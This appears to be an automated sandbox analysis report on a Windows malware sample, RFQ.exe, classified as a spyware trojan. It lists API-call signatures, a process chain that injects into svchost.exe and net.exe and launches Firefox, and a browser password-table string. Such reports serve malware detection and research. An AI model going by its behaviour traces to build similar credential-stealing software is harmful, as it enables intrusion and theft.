                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_00446313
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004333BE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0042200C1_2_0042200C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041A2171_2_0041A217
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004122161_2_00412216
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0042435D1_2_0042435D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004033C01_2_004033C0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044F4301_2_0044F430
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004125E81_2_004125E8
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044663B1_2_0044663B
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004096A01_2_004096A0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004138011_2_00413801
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0042096F1_2_0042096F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004129D01_2_004129D0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004119E31_2_004119E3
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041C9AE1_2_0041C9AE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0047EA6F1_2_0047EA6F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040FA101_2_0040FA10
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044EB5F1_2_0044EB5F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00423C811_2_00423C81
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00411E781_2_00411E78
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00442E0C1_2_00442E0C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00420EC01_2_00420EC0
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044CF171_2_0044CF17
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00444FD21_2_00444FD2
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_040336981_2_04033698
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00418A037_2_00418A03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F0437_2_0042F043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004031A07_2_004031A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004012007_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004102C37_2_004102C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416C437_2_00416C43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401C287_2_00401C28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00401C307_2_00401C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416C3E7_2_00416C3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004014D07_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004104E37_2_004104E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E5637_2_0040E563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402D217_2_00402D21
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00402D307_2_00402D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004025DC7_2_004025DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004025E07_2_004025E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FA3527_2_036FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F07_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037003E67_2_037003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E02747_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C02C07_2_036C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C81587_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036301007_2_03630100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA1187_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F81CC7_2_036F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037001AA7_2_037001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D20007_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036407707_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036647507_2_03664750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363C7C07_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365C6E07_2_0365C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036405357_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037005917_2_03700591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F24467_2_036F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E44207_2_036E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EE4F67_2_036EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FAB407_2_036FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F6BD77_2_036F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363EA807_2_0363EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036569627_2_03656962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036429A07_2_036429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370A9A67_2_0370A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364A8407_2_0364A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036428407_2_03642840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E8F07_2_0366E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036268B87_2_036268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B4F407_2_036B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03682F287_2_03682F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660F307_2_03660F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E2F307_2_036E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364CFE07_2_0364CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632FC87_2_03632FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BEFA07_2_036BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640E597_2_03640E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FEE267_2_036FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FEEDB7_2_036FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03652E907_2_03652E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FCE937_2_036FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364AD007_2_0364AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DCD1F7_2_036DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363ADE07_2_0363ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03658DBF7_2_03658DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640C007_2_03640C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630CF27_2_03630CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0CB57_2_036E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362D34C7_2_0362D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F132D7_2_036F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0368739A7_2_0368739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E12ED7_2_036E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B2C07_2_0365B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036452A07_2_036452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367516C7_2_0367516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362F1727_2_0362F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0370B16B7_2_0370B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364B1B07_2_0364B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F70E97_2_036F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FF0E07_2_036FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EF0CC7_2_036EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036470C07_2_036470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FF7B07_2_036FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F16CC7_2_036F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F75717_2_036F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DD5B07_2_036DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036314607_2_03631460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FF43F7_2_036FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFB767_2_036FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B5BF07_2_036B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0367DBF97_2_0367DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365FB807_2_0365FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B3A6C7_2_036B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFA497_2_036FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F7A467_2_036F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EDAC67_2_036EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DDAAC7_2_036DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03685AA07_2_03685AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E1AA37_2_036E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036499507_2_03649950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365B9507_2_0365B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D59107_2_036D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AD8007_2_036AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036438E07_2_036438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFF097_2_036FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFFB17_2_036FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03641F927_2_03641F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03649EB07_2_03649EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F7D737_2_036F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03643D407_2_03643D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F1D5A7_2_036F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365FDC07_2_0365FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B9C327_2_036B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036FFCF27_2_036FFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039B03E611_2_039B03E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038FE3F011_2_038FE3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AA35211_2_039AA352
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039702C011_2_039702C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0399027411_2_03990274
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039B01AA11_2_039B01AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A41A211_2_039A41A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A81CC11_2_039A81CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0398A11811_2_0398A118
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038E010011_2_038E0100
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0397815811_2_03978158
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0398200011_2_03982000
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038EC7C011_2_038EC7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0391475011_2_03914750
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F077011_2_038F0770
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0390C6E011_2_0390C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039B059111_2_039B0591
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F053511_2_038F0535
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0399E4F611_2_0399E4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0399442011_2_03994420
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A244611_2_039A2446
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A6BD711_2_039A6BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AAB4011_2_039AAB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038EEA8011_2_038EEA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F29A011_2_038F29A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039BA9A611_2_039BA9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0390696211_2_03906962
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038D68B811_2_038D68B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0391E8F011_2_0391E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F284011_2_038F2840
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038FA84011_2_038FA840
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0396EFA011_2_0396EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038E2FC811_2_038E2FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038FCFE011_2_038FCFE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03910F3011_2_03910F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03992F3011_2_03992F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03932F2811_2_03932F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03964F4011_2_03964F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03902E9011_2_03902E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039ACE9311_2_039ACE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AEEDB11_2_039AEEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AEE2611_2_039AEE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F0E5911_2_038F0E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03908DBF11_2_03908DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038EADE011_2_038EADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0398CD1F11_2_0398CD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038FAD0011_2_038FAD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03990CB511_2_03990CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038E0CF211_2_038E0CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F0C0011_2_038F0C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0393739A11_2_0393739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A132D11_2_039A132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038DD34C11_2_038DD34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F52A011_2_038F52A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0390B2C011_2_0390B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039912ED11_2_039912ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038FB1B011_2_038FB1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039BB16B11_2_039BB16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0392516C11_2_0392516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038DF17211_2_038DF172
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F70C011_2_038F70C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0399F0CC11_2_0399F0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A70E911_2_039A70E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AF0E011_2_039AF0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AF7B011_2_039AF7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A16CC11_2_039A16CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0393563011_2_03935630
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0398D5B011_2_0398D5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039B95C311_2_039B95C3
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A757111_2_039A7571
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AF43F11_2_039AF43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038E146011_2_038E1460
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0390FB8011_2_0390FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03965BF011_2_03965BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0392DBF911_2_0392DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AFB7611_2_039AFB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03935AA011_2_03935AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0398DAAC11_2_0398DAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03991AA311_2_03991AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0399DAC611_2_0399DAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AFA4911_2_039AFA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A7A4611_2_039A7A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03963A6C11_2_03963A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0398591011_2_03985910
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0390B95011_2_0390B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F995011_2_038F9950
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F38E011_2_038F38E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0395D80011_2_0395D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F1F9211_2_038F1F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AFFB111_2_039AFFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038B3FD211_2_038B3FD2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038B3FD511_2_038B3FD5
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AFF0911_2_039AFF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F9EB011_2_038F9EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0390FDC011_2_0390FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A1D5A11_2_039A1D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_038F3D4011_2_038F3D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039A7D7311_2_039A7D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_039AFCF211_2_039AFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_03969C3211_2_03969C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B1F8011_2_030B1F80
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030ACEA011_2_030ACEA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030AB14011_2_030AB140
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030AD0C011_2_030AD0C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B55E011_2_030B55E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B381B11_2_030B381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030B382011_2_030B3820
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030CBC2011_2_030CBC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374E30411_2_0374E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0375522411_2_03755224
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374E1E411_2_0374E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374D76811_2_0374D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0374E46C11_2_0374E46C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 102 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0396F290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03925130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 038DB970 appears 277 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03937E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0395EA12 appears 86 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 004115D7 appears 36 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 00416C70 appears 39 times
                Source: C:\Users\user\Desktop\RFQ.exeCode function: String function: 00445AE0 appears 65 times
                Source: RFQ.exe, 00000001.00000003.1280590197.000000000495D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exe, 00000001.00000003.1282452429.00000000047B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ.exe
                Source: RFQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/8
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0044AF6C GetLastError,FormatMessageW,1_2_0044AF6C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,1_2_004333BE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,1_2_00464EAE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,1_2_0045D619
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,1_2_004755C4
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,1_2_0047839D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,1_2_0043305F
                Source: C:\Users\user\Desktop\RFQ.exeFile created: C:\Users\user~1\AppData\Local\Temp\fricandeauxJump to behavior
                Source: RFQ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\RFQ.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 0000000B.00000002.3124155350.0000000003384000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1695081493.0000000003384000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3124155350.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.1695081493.00000000033B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\RFQ.exeFile read: C:\Users\user\Desktop\RFQ.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: mpr.dllJump to behavior
